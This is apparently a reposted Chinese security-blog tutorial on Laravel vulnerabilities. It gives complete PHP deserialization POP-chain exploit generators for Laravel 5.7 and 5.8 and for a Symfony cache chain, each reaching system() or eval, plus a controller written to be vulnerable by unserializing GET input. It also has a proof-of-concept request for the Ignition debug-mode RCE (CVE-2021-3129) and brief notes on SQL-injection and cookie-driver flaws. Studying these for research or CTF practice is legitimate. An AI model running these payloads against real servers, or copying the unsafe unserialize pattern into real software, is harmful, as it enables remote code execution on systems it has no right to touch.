Laravel漏洞学习

admin 2022年1月6日01:44:46安全博客 CTF专场评论10 views6193字阅读20分38秒阅读模式

laravel漏洞学习

安装

1
composer create-project laravel/laravel laravel57 "5.7.*"

Laravel5.7反序列化漏洞

详情可看此文章:
https://xz.aliyun.com/t/5911
https://www.cnblogs.com/tr1ple/p/11079354.html

漏洞描述:

Laravel Framework是Taylor Otwell软件开发者开发的一款基于PHP的Web应用程序开发框架。Illuminate是其中的一个组件。Laravel Framework 5.7.x版本中的Illuminate组件存在反序列化漏洞,远程攻击者可利用该漏洞执行代码。

假设存在以下二次开发漏洞点:
在 laravel57/app/Http/Controllers/ 下添加 DemoController 控制器,代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php 
namespace App\Http\Controllers;

use Illuminate\Http\Request;

class DemoController extends Controller
{
public function demo()
{
if(isset($_GET['c'])){
$code = $_GET['c'];
unserialize($code);
}
else{
highlight_file(__FILE__);
}
return "Welcome to laravel5.7";
}
}

在 laravel57/routes/web.php 文件中添加一条路由,便于我们后续访问

1
Route::get('/',"[email protected]");

exp

放在public文件夹下执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php

namespace Illuminate\Foundation\Testing{
class PendingCommand{
protected $command;
protected $parameters;
protected $app;
public $test;

public function __construct($command, $parameters,$class,$app){
$this->command = $command;
$this->parameters = $parameters;
$this->test=$class;
$this->app=$app;
}
}
}

namespace Illuminate\Auth{
class GenericUser{
protected $attributes;
public function __construct(array $attributes){
$this->attributes = $attributes;
}
}
}

namespace Illuminate\Foundation{
class Application{
protected $hasBeenBootstrapped = false;
protected $bindings;

public function __construct($bind){
$this->bindings=$bind;
}
}
}

namespace{
$genericuser = new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1")));
$application = new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application")));
$pendingcommand = new Illuminate\Foundation\Testing\PendingCommand("system",array('id'),$genericuser,$application);
echo urlencode(serialize($pendingcommand));
}

?>

Laravel5.8.x反序列化POP链

exp1:
详情可看 https://xz.aliyun.com/t/6059

在 laravel58/routes/web.php 文件添加路由

1
Route::get("/","\App\Http\Controllers\[email protected]");

在 laravel58/app/Http/Controllers/ 下添加 DemoController.php 控制器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
namespace App\Http\Controllers;

class DemoController extends Controller
{
public function demo()
{
if(isset($_GET['c'])){
$code = $_GET['c'];
unserialize($code);
}
else{
highlight_file(__FILE__);
}
return "Welcome to laravel5.8";
}
}

exp1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?php
namespace PhpParser\Node\Scalar\MagicConst{
class Line {}
}
namespace Mockery\Generator{
class MockDefinition
{
protected $config;
protected $code;

public function __construct($config, $code)
{
$this->config = $config;
$this->code = $code;
}
}
}
namespace Mockery\Loader{
class EvalLoader{}
}
namespace Illuminate\Bus{
class Dispatcher
{
protected $queueResolver;
public function __construct($queueResolver)
{
$this->queueResolver = $queueResolver;
}
}
}
namespace Illuminate\Foundation\Console{
class QueuedCommand
{
public $connection;
public function __construct($connection)
{
$this->connection = $connection;
}
}
}
namespace Illuminate\Broadcasting{
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($events, $event)
{
$this->events = $events;
$this->event = $event;
}
}
}
namespace{
$line = new PhpParser\Node\Scalar\MagicConst\Line();
$mockdefinition = new Mockery\Generator\MockDefinition($line,'<?php phpinfo();?>');
$evalloader = new Mockery\Loader\EvalLoader();
$dispatcher = new Illuminate\Bus\Dispatcher(array($evalloader,'load'));
$queuedcommand = new Illuminate\Foundation\Console\QueuedCommand($mockdefinition);
$pendingbroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispatcher,$queuedcommand);
echo urlencode(serialize($pendingbroadcast));
}
?>

exp2:
这条链来自前一阵CTF国赛某道题目。漏洞存在symfony组件中(影响至罪行4.4.x-dev 版本),而默认安装的 laravel5.8 框架没有包含该组件。为了复现该漏洞,我们需要将composer.json 文件中的 require添加 "symfony/symfony": "4.*"并执行 composer update命令即可。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<?php
namespace Symfony\Component\Cache{
final class CacheItem
{
protected $expiry;
protected $poolHash;
protected $innerItem;
public function __construct($expiry, $poolHash, $command)
{
$this->expiry = $expiry;
$this->poolHash = $poolHash;
$this->innerItem = $command;
}
}
}
namespace Symfony\Component\Cache\Adapter{
class ProxyAdapter
{
private $poolHash;
private $setInnerItem;
public function __construct($poolHash, $func)
{
$this->poolHash = $poolHash;
$this->setInnerItem = $func;
}
}
class TagAwareAdapter
{
private $deferred = [];
private $pool;
public function __construct($deferred, $pool)
{
$this->deferred = $deferred;
$this->pool = $pool;
}
}
}
namespace {
$cacheitem = new Symfony\Component\Cache\CacheItem(1,1,"whoami");
$proxyadapter = new Symfony\Component\Cache\Adapter\ProxyAdapter(1,'system');
$tagawareadapter = new Symfony\Component\Cache\Adapter\TagAwareAdapter(array($cacheitem),$proxyadapter);
echo urlencode(serialize($tagawareadapter));
}

Laravel 5.8 SQL 注入漏洞

Laravel 5.8.5以下版本
https://xz.aliyun.com/t/5331

数据库添加

1
2
3
4
5
6
7
8
9
10
create table users(
id int auto_increment,
username varchar(250),
password varchar(250),
level int,
primary key(id)
);
insert into users values(1,'admin','admin',1);
insert into users values(2,'user','123456',2);
insert into users values(3,'aaa','bbb',3);

Laravel <= 8.4.2 Debug模式 _ignition远程代码执行漏洞

详细文章:https://whoamianony.top/2021/01/15/lou-dong-fu-xian/laravel/laravel-debug-mode-rce-cve-2021-3129-li-yong-fu-xian/

当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意Log文件等方式触发Phar反序列化,从而造成远程代码执行,控制服务器。

1
2
3
4
5
6
7
8
9

git clone https://github.com/laravel/laravel.git
cd laravel
git checkout e849812
composer install
composer require facade/ignition==2.5.1
将.env.example修改为.env
php artisan key:generate
php artisan serve --host=0.0.0.0

poc

1
2
3
4
5
6
7
8
9
10
11
12
POST /_ignition/execute-solution HTTP/1.1
Host: localhost:8000
Content-Type: application/json
Content-Length: 168

{
"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
"parameters": {
"variableName": "username",
"viewFile": "xxxxxxx"//phar文件位置
}
}

Laravel cookie

Laravel发布安全更新,其中指出使用cookie session driver的应用受到漏洞影响,该漏洞会导致rce。
https://blog.laravel.com/laravel-cookie-security-releases
http://x2y.pw/2020/08/06/Laravel-Cookie-Security%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
影响版本:< v6.18.27,< v7.22.0

漏洞比较鸡肋,限制条件较多

  • 需要开启cookie session driver,默认是file driver
  • 需要开发者特定的漏洞代码 cookie(‘key’, $value ,value的值完全可控
  • 反序列化调用链

参考文章

Laravel5.7反序列化漏洞之RCE链挖掘
Laravel5.8.x反序列化POP链

FROM :blog.cfyqy.com | Author:cfyqy

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:44:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Laravel漏洞学习 http://cn-sec.com/archives/722537.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: